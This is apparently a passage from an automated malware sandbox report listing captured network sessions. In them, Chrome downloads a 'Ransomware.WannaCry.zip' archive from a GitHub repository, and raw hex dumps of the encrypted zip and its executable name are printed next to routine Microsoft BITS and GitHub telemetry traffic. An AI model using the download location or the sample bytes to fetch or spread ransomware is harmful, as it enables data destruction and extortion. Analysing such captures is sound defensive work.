                                                                                      2024-03-23 14:47:33 UTC16384INData Raw: 82 d7 ba 82 00 05 38 ff 9a 62 24 d9 41 8e c8 48 33 52 af de a6 9e 58 6b a2 b3 3b 67 39 59 fe 0a 24 fb 6a 3f 57 b3 c3 64 f8 ec 08 f6 e0 44 68 85 ba 60 51 8d 4c e1 48 58 ba 6e c0 5a 23 8b 41 04 88 93 8b 72 7c 7f 36 2b af 4c 74 68 c4 f3 44 4c 4e d2 7e 49 2c b3 08 49 2e d0 53 ba 3a f4 3e 7d 99 a3 75 d9 1b aa 01 1d 82 65 af ad 1d 22 25 46 a0 6e e2 36 b3 93 62 69 b4 d0 22 8a cb 92 6e a1 d6 b2 81 db a3 35 aa 67 f5 79 44 5c ec f5 e3 5c ca e8 e4 4b d3 3d b8 29 c6 d6 eb e1 ec 68 7d 9f d0 ce ce d7 0c 78 fd a7 e5 2a 13 ce 16 8a da 39 92 c8 d4 10 42 ae c9 90 7d 9d 83 02 7a ee 3a 8f 6c 0f f8 e5 11 55 8b ec e7 2c 95 ab e2 65 51 5e fa 45 d2 9f dd 81 e5 32 bd 43 0c 7e 37 6e 27 fb 1a fc b6 c9 ed 4f ad e4 b8 c2 32 44 5a 0a ae 8a 0a 40 01 b6 bd 84 42 bf 8c e7 2e c9 83 e1 0c
                                                                                      Data Ascii: 8b$AH3RXk;g9Y$j?WdDh`QLHXnZ#Ar|6+LthDLN~I,I.S:>}ue"%Fn6bi"n5gyD\\K=)h}x*9B}z:lU,eQ^E2C~7n'O2DZ@B.
                                                                                      2024-03-23 14:47:33 UTC16384INData Raw: a1 e1 d6 6e 8d 23 f0 46 f7 d8 35 28 39 ca 2c 50 fd d2 b2 75 8a 7c 88 bf 67 5f 58 ce df 81 f3 78 45 e0 da 27 fb d3 76 29 c8 6f 9f e7 10 12 ba c2 59 20 73 76 3a c6 ee 73 b6 a8 b3 e7 ae b6 2c 6e be 61 41 ba a4 56 94 22 51 61 e5 a0 aa 25 d2 58 f5 b1 8c e9 1f 7d 3a 93 c5 79 53 f4 30 85 7b 4f 74 87 50 6f 63 15 a7 0a 82 28 45 2c 38 75 48 3e 4a fb 2d d6 49 d1 0a 36 a3 1f 5d 6e 53 6c 88 70 b2 c6 d8 e9 77 c6 3c 26 0c 01 0e d3 a4 d3 1c f1 70 0a 14 9d 9c 2e df 10 fd d5 3c 44 1f 92 be 22 2b 02 83 1a be 37 23 e9 83 95 dc c7 90 19 22 c3 42 ea b5 64 f6 b7 97 b5 23 c1 ea 0b f7 2e 39 02 1c e6 8a ad f4 94 a2 dd 52 7a 32 e7 bf 26 21 60 44 48 ce 9a b1 ff f6 3e e3 70 32 f4 b5 dc 26 c6 f7 db bc 9b e6 30 b5 b2 fe 2a 8c cb c8 7b e3 a7 c0 3d 8d 45 5e 92 d6 e9 f6 fd 42 5c 39 80 5c
                                                                                      Data Ascii: n#F5(9,Pu|g_XxE'v)oY sv:s,naAV"Qa%X}:yS0{OtPoc(E,8uH>J-I6]nSlpw<&p.<D"+7#"Bd#.9Rz2&!`DH>p2&0*{=E^B\9\
                                                                                      2024-03-23 14:47:33 UTC16384INData Raw: 9d 6c c6 ce 17 d8 05 6b e9 5d b3 37 82 da c3 45 fc da 2f d2 c6 f0 10 37 38 f6 20 6f 25 8a 7c 83 59 4f 85 38 44 5c 7e 24 66 ec a4 1f d2 33 8d 26 9c b5 10 81 41 9b 60 01 99 83 c8 df 06 ac f4 b8 39 1a b1 80 7e b6 0b 4e c8 7b 45 0b 54 1a 24 d0 b1 47 7d ea 69 a7 c9 67 d8 ef 74 20 04 a0 8e 9f fe fb 12 ad b5 4d a4 82 3a 1a 16 b1 55 fb 59 78 61 61 98 4c f9 38 ce 5f 45 20 25 83 57 e3 b5 98 e7 5c 4d 62 fd 4d e2 6d 74 a4 7f ad 96 30 60 3b 2e 16 1a ba 37 23 e9 bd aa d7 8b a7 30 8f 60 b6 cd dd 36 7c dd 5d fe 74 c9 b4 af 08 84 ff 4f 15 55 a1 10 9d 95 c3 57 01 23 f5 3e 35 68 9b 2f d3 83 31 f1 23 82 94 93 cc f3 a9 f2 de 50 e1 05 c5 e1 96 f6 93 c2 d6 f0 67 7e 70 7b 78 3e e8 a7 36 a9 6f d9 83 0d b1 48 e2 06 c1 22 23 84 52 b6 46 b4 7b 8e 85 89 56 56 ef 70 b7 78 6d 86 5a 98
                                                                                      Data Ascii: lk]7E/78 o%|YO8D\~$f3&A`9~N{ET$G}igt M:UYxaaL8_E %W\MbMmt0`;.7#0`6|]tOUW#>5h/1#Pg~p{x>6oH"#RF{VVpxmZ


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      160192.168.2.164987723.51.58.94443
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:33 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      Accept-Encoding: identity
                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                      Host: fs.microsoft.com
                                                                                      2024-03-23 14:47:33 UTC467INHTTP/1.1 200 OK
                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                      Content-Type: application/octet-stream
                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                      Server: ECAcc (dce/26AC)
                                                                                      X-CID: 11
                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                      X-Ms-Region: prod-eus-z1
                                                                                      Cache-Control: public, max-age=235547
                                                                                      Date: Sat, 23 Mar 2024 14:47:33 GMT
                                                                                      Connection: close
                                                                                      X-CID: 2


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      161192.168.2.164987823.51.58.94443
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:34 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      Accept-Encoding: identity
                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                      Range: bytes=0-2147483646
                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                      Host: fs.microsoft.com
                                                                                      2024-03-23 14:47:34 UTC456INHTTP/1.1 200 OK
                                                                                      ApiVersion: Distribute 1.1
                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                      Content-Type: application/octet-stream
                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                      Server: ECAcc (chd/0778)
                                                                                      X-CID: 11
                                                                                      Cache-Control: public, max-age=235570
                                                                                      Date: Sat, 23 Mar 2024 14:47:34 GMT
                                                                                      Content-Length: 55
                                                                                      Connection: close
                                                                                      X-CID: 2
                                                                                      2024-03-23 14:47:34 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      162192.168.2.1649879185.199.108.1334436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:34 UTC415OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: raw.githubusercontent.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:35 UTC887INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 3481589
                                                                                      Cache-Control: max-age=300
                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                      Content-Type: application/zip
                                                                                      ETag: "fac34b01ee946a0c48a8bcb27070461075d685f5c74c2a17e9db2873c0b74b41"
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-Frame-Options: deny
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-GitHub-Request-Id: C65A:21F48B:6FF0BA:89648A:65FEEB87
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:35 GMT
                                                                                      Via: 1.1 varnish
                                                                                      X-Served-By: cache-ewr18170-EWR
                                                                                      X-Cache: MISS
                                                                                      X-Cache-Hits: 0
                                                                                      X-Timer: S1711205255.081968,VS0,VE106
                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      X-Fastly-Request-ID: 0aca6dca2d2996a72f4884b4b61a864813b2f362
                                                                                      Expires: Sat, 23 Mar 2024 14:52:35 GMT
                                                                                      Source-Age: 0
                                                                                      2024-03-23 14:47:35 UTC16384INData Raw: 50 4b 03 04 14 00 09 00 08 00 a4 5b ae 4a aa fc 22 40 c7 1e 35 00 00 a0 35 00 44 00 1c 00 65 64 30 31 65 62 66 62 63 39 65 62 35 62 62 65 61 35 34 35 61 66 34 64 30 31 62 66 35 66 31 30 37 31 36 36 31 38 34 30 34 38 30 34 33 39 63 36 65 35 62 61 62 65 38 65 30 38 30 65 34 31 61 61 2e 65 78 65 55 54 09 00 03 b3 69 18 59 99 6a 18 59 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 63 ea c7 a4 7c 0e 21 39 08 17 89 cb 54 da f0 0e ad 49 f7 da 5e 9a 5a a6 40 bf 24 3a a5 96 f2 2d 00 68 cf 1e b3 2a c0 9b 20 b7 d1 78 7b 26 3a d5 d9 f8 c6 61 fa 84 a3 07 a3 fd f9 0e 86 19 44 7e 26 80 cd 18 9e 5e 41 ef 40 4e a2 df d6 87 fc dd 28 f3 62 fe cf 55 ce 61 af f9 b6 da c5 66 bf 4e 29 e7 2f 3f ce a4 8e 9a 65 28 a8 ea d1 33 34 23 00 11 a7 e8 fb e2 06 52 8b 1f 7f 97 c0 85 f5 5b 29
                                                                                      Data Ascii: PK[J"@55Ded01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeUTiYjYuxc|!9TI^Z@$:-h* x{&:aD~&^A@N(bUafN)/?e(34#R[)
                                                                                      2024-03-23 14:47:35 UTC16384INData Raw: b1 b1 32 43 6a 69 b4 de 29 6a 81 97 d1 fc 3d ec 31 e7 17 0e 0f fb d2 13 c2 26 71 6f db aa 97 b6 67 2b eb ca c4 f3 4c 22 44 71 2c 2f ab e4 fe bc 51 bb ae 73 b2 90 49 b6 44 40 18 b4 e5 9e 63 74 89 10 ef c1 94 19 dd e1 44 df 95 c4 bc 18 79 1a 0e a9 1c 2b a4 09 57 06 b6 86 0b 0a 4a df 7b cd f4 fb 2e b2 56 bd e0 79 da 8e b8 47 4e 4c 18 3d ec d3 19 c3 78 50 cb 98 73 b8 ef b3 8e d3 25 3d d4 54 46 92 15 d2 76 28 55 ee fe 20 9f 96 c2 2d e2 aa 4a 93 55 ca 8c 4e 31 0f 56 da 0d a0 c6 48 36 a9 7c a6 b7 f6 c2 a6 59 e1 f7 eb 3c 77 91 31 77 ce d0 41 f5 4e d0 9b 7e f8 97 9c 6d 1f c9 17 73 e4 38 87 ac 67 d2 0a 92 89 f5 8c 1d 02 01 32 fc 31 3f 1d f8 88 4b bb 21 12 21 b7 8c 92 e0 0b cc 67 d6 08 d4 9d 66 b6 48 d4 18 64 dc 64 b5 3d 8e 24 66 cc 6e fd eb 55 bb 41 ab 79 9d 8f f1
                                                                                      Data Ascii: 2Cji)j=1&qog+L"Dq,/QsID@ctDy+WJ{.VyGNL=xPs%=TFv(U -JUN1VH6|Y<w1wAN~ms8g21?K!!gfHdd=$fnUAy
                                                                                      2024-03-23 14:47:35 UTC16384INData Raw: da 79 56 99 c0 6d 8b a5 63 9b eb 19 7f 1f d5 b8 ed 19 b3 91 6c f9 d9 61 ba 74 d2 9b bd e0 71 f6 86 4d e0 47 a0 ec b4 81 d9 b9 1c 84 15 8b 98 08 b9 5e ca 01 b9 99 74 b2 88 df af 66 65 cc 98 cc c9 92 26 fe 66 35 c7 15 e8 e3 6b c9 86 54 cd 9f df ef 7d 47 3d 2b bd 7d 99 bb 60 22 c5 97 31 ee 22 d5 7e 49 84 df 8b 30 07 62 97 ee a7 39 5d 16 e3 bb 6d 22 de b0 a7 02 2d f4 9f ef 3d e9 f5 d1 28 08 46 d2 a1 00 ce 37 56 6a 1c 2f 4b 05 81 01 ef 51 44 86 26 41 b5 a5 de c1 e2 b5 34 46 71 6d 65 fd 59 00 89 fc a5 cb c7 d2 d5 af de e8 24 4c 95 fc f1 d8 7a bd 20 6d 31 87 78 1b 7d c9 ed 6f c9 f4 06 46 01 f9 ac 0e 46 06 9c 9f 05 c0 d4 f2 cc bc 2d 36 84 d5 d1 6c 95 14 0e f8 80 97 8f a4 e5 84 46 86 f7 e4 46 ec 74 67 e6 cc 13 a4 8b 08 c2 6e a8 15 c2 7b 29 e6 cc 21 2e ab 78 24 be
                                                                                      Data Ascii: yVmclatqMG^tfe&f5kT}G=+}`"1"~I0b9]m"-=(F7Vj/KQD&A4FqmeY$Lz m1x}oFF-6lFFtgn{)!.x$
                                                                                      2024-03-23 14:47:35 UTC16384INData Raw: 64 f1 0b 10 bb 70 ef d8 51 ab c9 76 24 65 06 4a 75 6c 33 89 cf b4 22 70 e2 2b ce 40 5e d4 d8 47 88 40 c5 a7 1e 45 d9 62 8b f1 a1 8e 18 df df 61 69 8d db 32 b9 29 f4 ba 1c d0 d0 9b 6f 44 2d f7 0e 63 16 5c 6f 32 b5 59 5c 1e 41 2a 6e f7 0f b8 af 27 05 2e 51 8e f5 aa 7b a8 2c 75 73 a3 cd a1 4a c3 e4 1e f9 28 a0 86 1a 9c 15 81 71 5b fc ee 8d 43 65 2c 72 9c 8b 17 0f 69 ce b0 ee 85 0b 2f 35 08 d3 44 e8 6c eb 3e 92 9b d5 61 c2 2a 51 df 4a 49 b2 3e 73 ff fa c6 8d 19 72 c4 09 ab 23 8c bc 05 27 82 25 88 49 fc e9 3f f8 1d 60 b3 ee 1b c7 b7 df 72 66 e3 9f ee 35 32 86 55 5d e1 71 bc 41 d7 76 30 24 98 b8 c6 fb ce 07 10 e2 fd 52 6f bd 4d 77 44 51 cd ce 90 f5 c4 31 11 de 74 91 b5 b2 57 fc 4e 09 90 3f 88 6e 9a cc 54 6b 8a d6 1c 42 5c e9 95 ef dd 3c e3 c4 cd dd ed f3 c2 a2
                                                                                      Data Ascii: dpQv$eJul3"p+@^G@Ebai2)oD-c\o2Y\A*n'.Q{,usJ(q[Ce,ri/5Dl>a*QJI>sr#'%I?`rf52U]qAv0$RoMwDQ1tWN?nTkB\<
                                                                                      2024-03-23 14:47:35 UTC16384INData Raw: 6c e4 0a fd 3e 01 83 a5 a8 1e 0f 24 2d 17 15 b5 a2 98 b1 33 c0 d1 fd d1 f2 dd 7a b3 00 92 c7 68 e8 42 a2 93 ea c5 dc aa 42 de 2e ad cf e0 a4 5e 73 fe ed 3d 25 f8 15 d3 a2 a0 99 b7 b0 0e 77 95 ac 34 7b cf 3b 7d b2 05 3c d0 da 76 4c 53 fe 3f 45 39 b2 27 0d 5a fa 87 10 6b bf 3c fe e4 c7 08 a1 f3 4e fc ba 5f 4c c2 05 ec 72 a2 56 16 2f ac 20 fa 08 8a 15 97 65 4b e8 7d d0 93 ad 89 b6 39 11 8b 5b e8 8c 29 3d f0 35 28 be 2f 91 94 11 ae 85 4c a6 ae da 7d 0c 8a 5e 75 b4 ae 04 da 34 57 76 13 94 41 f2 78 2d 5d f0 11 15 ee 26 1a e3 8f 0c be 38 57 7a 8b d9 df 5e 2d c6 8c 4c 0a ee 20 63 a5 c6 7c 28 d7 7b 20 cc 07 a2 d7 e4 b2 f9 80 63 04 f7 e7 ff 6d 37 e1 a8 a5 19 15 67 d9 3c c9 48 fa 0d 48 ad 34 91 bc 99 42 4b f2 08 0e 6b fd b5 6d 6e 28 c7 14 22 e9 53 ca 5a ad 02 f4 a5
                                                                                      Data Ascii: l>$-3zhBB.^s=%w4{;}<vLS?E9'Zk<N_LrV/ eK}9[)=5(/L}^u4WvAx-]&8Wz^-L c|({ cm7g<HH4BKkmn("SZ
                                                                                      2024-03-23 14:47:35 UTC16384INData Raw: 87 d9 6e fb 52 7b 99 7b 72 c5 49 8b 0d d5 9c db 6e 48 39 d7 b9 68 a1 f3 34 7e c2 57 41 71 e1 65 a3 2f 79 de b8 58 d2 2b d5 1f 04 85 6b 77 4f b4 c5 08 3b 86 b7 38 2b 40 4d 3c 40 2a f5 d3 84 9b 50 29 36 af 30 1d 28 38 1a 77 53 63 31 76 97 d7 c5 5d 2d 7e e7 c6 8a f4 08 3b d8 bc aa bd 2d 2a be 3e 1e a3 ce bb e8 30 ee 0b 21 54 0b 7b 1b ba f2 d5 59 86 17 09 84 65 b3 bc 10 81 e1 d7 19 6b 2e fd c7 7a d2 4a 4b 23 84 f8 53 a4 c8 71 c4 30 ae b6 fa 38 26 9e 2c 32 fb f2 41 59 dc f7 bb 5e fe 8b e7 7d f0 53 17 de 68 b0 9d 80 9f 48 04 16 96 07 18 49 46 32 e3 09 ce 38 78 d4 96 eb 14 3f 1b 81 9e 73 a7 c2 62 f6 df 55 19 84 a4 95 b7 d5 8a cf de 7d f7 c0 86 9d 83 54 3b 6b 9c 74 21 ff 69 ea d9 35 5b e8 a6 d1 3c d5 87 6d 37 2d da 1e f5 e3 eb 53 59 82 2e 5c 36 31 36 9b 09 09 51
                                                                                      Data Ascii: nR{{rInH9h4~WAqe/yX+kwO;8+@M<@*P)60(8wSc1v]-~;-*>0!T{Yek.zJK#Sq08&,2AY^}ShHIF28x?sbU}T;kt!i5[<m7-SY.\616Q
                                                                                      2024-03-23 14:47:35 UTC16384INData Raw: 33 de f4 1f 97 c8 d6 07 32 c1 c9 cc 78 60 ff 64 31 14 ad 74 b3 35 8e 59 cb 5c f2 6f 6b 7d 95 98 3d 12 63 dc b3 5e 5f 08 17 0d 10 2a 2d 88 35 cb d9 62 63 cc 20 6c 63 83 73 c1 7d 4c 53 65 7f 84 a8 7c ac d9 ca 09 ec c8 0a 6d cb 19 58 3d 11 1f cc 1a 79 cc bf a6 11 0c b6 a6 d4 c6 77 03 c6 67 60 a0 86 c4 72 3f 56 25 fb 3e 0a f2 a5 97 16 38 85 66 9a 89 3d 20 be cc ea a1 88 84 1c d4 e4 e9 72 d4 d4 f7 3b e9 f8 20 0c f0 b0 92 a1 f2 d9 f8 b3 34 3e c8 22 9f 94 99 f5 bd f9 7f fc 68 7b 3b fa 25 d6 41 0e 16 7c 9a d7 2e b8 8c 0d c0 98 fc bd 3e f6 55 94 5b 7a 04 9d 46 86 23 c4 32 73 e3 88 8e b7 55 d5 ba e4 a7 6e 90 e8 cd bf a5 84 46 d9 86 9b 24 68 2e d8 a5 16 7c 2d 75 19 64 2a ab 99 19 b0 ce 52 8d 1a 5e b5 a7 3c 02 0d 4a cd d2 f4 00 92 04 63 6e e8 67 c3 f5 2e 5c 9a c2 fe
                                                                                      Data Ascii: 32x`d1t5Y\ok}=c^_*-5bc lcs}LSe|mX=ywg`r?V%>8f= r; 4>"h{;%A|.>U[zF#2sUnF$h.|-ud*R^<Jcng.\
                                                                                      2024-03-23 14:47:35 UTC16384INData Raw: 82 d7 ba 82 00 05 38 ff 9a 62 24 d9 41 8e c8 48 33 52 af de a6 9e 58 6b a2 b3 3b 67 39 59 fe 0a 24 fb 6a 3f 57 b3 c3 64 f8 ec 08 f6 e0 44 68 85 ba 60 51 8d 4c e1 48 58 ba 6e c0 5a 23 8b 41 04 88 93 8b 72 7c 7f 36 2b af 4c 74 68 c4 f3 44 4c 4e d2 7e 49 2c b3 08 49 2e d0 53 ba 3a f4 3e 7d 99 a3 75 d9 1b aa 01 1d 82 65 af ad 1d 22 25 46 a0 6e e2 36 b3 93 62 69 b4 d0 22 8a cb 92 6e a1 d6 b2 81 db a3 35 aa 67 f5 79 44 5c ec f5 e3 5c ca e8 e4 4b d3 3d b8 29 c6 d6 eb e1 ec 68 7d 9f d0 ce ce d7 0c 78 fd a7 e5 2a 13 ce 16 8a da 39 92 c8 d4 10 42 ae c9 90 7d 9d 83 02 7a ee 3a 8f 6c 0f f8 e5 11 55 8b ec e7 2c 95 ab e2 65 51 5e fa 45 d2 9f dd 81 e5 32 bd 43 0c 7e 37 6e 27 fb 1a fc b6 c9 ed 4f ad e4 b8 c2 32 44 5a 0a ae 8a 0a 40 01 b6 bd 84 42 bf 8c e7 2e c9 83 e1 0c
                                                                                      Data Ascii: 8b$AH3RXk;g9Y$j?WdDh`QLHXnZ#Ar|6+LthDLN~I,I.S:>}ue"%Fn6bi"n5gyD\\K=)h}x*9B}z:lU,eQ^E2C~7n'O2DZ@B.
                                                                                      2024-03-23 14:47:35 UTC16384INData Raw: a1 e1 d6 6e 8d 23 f0 46 f7 d8 35 28 39 ca 2c 50 fd d2 b2 75 8a 7c 88 bf 67 5f 58 ce df 81 f3 78 45 e0 da 27 fb d3 76 29 c8 6f 9f e7 10 12 ba c2 59 20 73 76 3a c6 ee 73 b6 a8 b3 e7 ae b6 2c 6e be 61 41 ba a4 56 94 22 51 61 e5 a0 aa 25 d2 58 f5 b1 8c e9 1f 7d 3a 93 c5 79 53 f4 30 85 7b 4f 74 87 50 6f 63 15 a7 0a 82 28 45 2c 38 75 48 3e 4a fb 2d d6 49 d1 0a 36 a3 1f 5d 6e 53 6c 88 70 b2 c6 d8 e9 77 c6 3c 26 0c 01 0e d3 a4 d3 1c f1 70 0a 14 9d 9c 2e df 10 fd d5 3c 44 1f 92 be 22 2b 02 83 1a be 37 23 e9 83 95 dc c7 90 19 22 c3 42 ea b5 64 f6 b7 97 b5 23 c1 ea 0b f7 2e 39 02 1c e6 8a ad f4 94 a2 dd 52 7a 32 e7 bf 26 21 60 44 48 ce 9a b1 ff f6 3e e3 70 32 f4 b5 dc 26 c6 f7 db bc 9b e6 30 b5 b2 fe 2a 8c cb c8 7b e3 a7 c0 3d 8d 45 5e 92 d6 e9 f6 fd 42 5c 39 80 5c
                                                                                      Data Ascii: n#F5(9,Pu|g_XxE'v)oY sv:s,naAV"Qa%X}:yS0{OtPoc(E,8uH>J-I6]nSlpw<&p.<D"+7#"Bd#.9Rz2&!`DH>p2&0*{=E^B\9\
                                                                                      2024-03-23 14:47:35 UTC16384INData Raw: 9d 6c c6 ce 17 d8 05 6b e9 5d b3 37 82 da c3 45 fc da 2f d2 c6 f0 10 37 38 f6 20 6f 25 8a 7c 83 59 4f 85 38 44 5c 7e 24 66 ec a4 1f d2 33 8d 26 9c b5 10 81 41 9b 60 01 99 83 c8 df 06 ac f4 b8 39 1a b1 80 7e b6 0b 4e c8 7b 45 0b 54 1a 24 d0 b1 47 7d ea 69 a7 c9 67 d8 ef 74 20 04 a0 8e 9f fe fb 12 ad b5 4d a4 82 3a 1a 16 b1 55 fb 59 78 61 61 98 4c f9 38 ce 5f 45 20 25 83 57 e3 b5 98 e7 5c 4d 62 fd 4d e2 6d 74 a4 7f ad 96 30 60 3b 2e 16 1a ba 37 23 e9 bd aa d7 8b a7 30 8f 60 b6 cd dd 36 7c dd 5d fe 74 c9 b4 af 08 84 ff 4f 15 55 a1 10 9d 95 c3 57 01 23 f5 3e 35 68 9b 2f d3 83 31 f1 23 82 94 93 cc f3 a9 f2 de 50 e1 05 c5 e1 96 f6 93 c2 d6 f0 67 7e 70 7b 78 3e e8 a7 36 a9 6f d9 83 0d b1 48 e2 06 c1 22 23 84 52 b6 46 b4 7b 8e 85 89 56 56 ef 70 b7 78 6d 86 5a 98
                                                                                      Data Ascii: lk]7E/78 o%|YO8D\~$f3&A`9~N{ET$G}igt M:UYxaaL8_E %W\MbMmt0`;.7#0`6|]tOUW#>5h/1#Pg~p{x>6oH"#RF{VVpxmZ


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      163192.168.2.1649881140.82.113.64436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:48:01 UTC795OUTPOST /_private/browser/stats HTTP/1.1
                                                                                      Host: api.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1061
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:48:01 UTC1061OUTData Raw: 7b 22 73 74 61 74 73 22 3a 20 5b 7b 22 77 65 62 56 69 74 61 6c 54 69 6d 69 6e 67 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 61 70 70 22 3a 22 72 65 61 63 74 2d 63 6f 64 65 2d 76 69 65 77 22 2c 22 63 6c 73 22 3a 30 2e 30 30 31 38 39 33 31 36 35 31 39 33 30 32 39 39 30 36 31 2c 22 6e 65 74 77 6f 72 6b 43 6f 6e 6e 54 79 70 65 22 3a 22 34 67 22 2c 22 73 73 72 22 3a 66 61 6c 73 65 2c 22 6c 61 7a 79 22 3a 66 61 6c 73 65 2c 22 61 6c 74 65 72 6e 61 74 65 22 3a 66 61 6c 73 65 7d 5d 2c 22 74 69
                                                                                      Data Ascii: {"stats": [{"webVitalTimings":[{"name":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","app":"react-code-view","cls":0.0018931651930299061,"networkConnType":"4g","ssr":false,"lazy":false,"alternate":false}],"ti
                                                                                      2024-03-23 14:48:01 UTC1108INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:48:01 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 0
                                                                                      Cache-Control: no-cache
                                                                                      X-RateLimit-Limit: 60
                                                                                      X-RateLimit-Remaining: 60
                                                                                      X-RateLimit-Reset: 1711208881
                                                                                      X-RateLimit-Used: 0
                                                                                      X-RateLimit-Resource: core
                                                                                      X-GitHub-Media-Type: github.v3; format=json
                                                                                      x-github-api-version-selected: 2022-11-28
                                                                                      Access-Control-Expose-Headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Vary: Accept-Encoding, Accept, X-Requested-With
                                                                                      X-GitHub-Request-Id: D424:221F:2BBFFBC:4CB1F04:65FEEBA1
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      164192.168.2.1649882140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:48:01 UTC793OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1663
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
